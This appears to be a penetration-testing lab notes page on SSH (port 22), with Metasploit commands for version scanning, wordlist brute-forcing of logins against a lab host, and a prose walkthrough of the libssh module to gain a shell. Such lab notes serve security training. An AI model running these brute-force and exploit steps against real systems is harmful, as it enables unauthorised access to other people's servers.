Port 22 SSH

SSH Enumeration

Version Enumeration with Metasploit

msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS demo.ine.local
exploit

Bruteforce SSH

Metasploit SSH bruteforcing

We will now use ssh_login module to find the valid credentials to access the ssh server.

use auxiliary/scanner/ssh/ssh_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
set STOP_ON_SUCCESS true
set VERBOSE true
exploit

SSH Exploitation

Exploiting libssh with metasploit

Metasploit has an exploit for this. In the same module, there are both auxiliary scans and the exploit itself. Since we need to exploit it, let’s first check the available options.

For this exploit, we only need to set two parameters: RHOSTS and SPAWN_PTY. In the auxiliary section, we can confirm that it will directly spawn a shell once executed.

After setting the parameters, type exploit to execute the exploit and gain access to the shell.

As the output shows, the session has been created and opened. To verify, type the following command: sessions

To use this session, type sessions -i 2. This will successfully grant us access to the shell.

PreviousPort 20/21 - FTP Pentesting NextPort 23 Telnet

Last updated 1 hour ago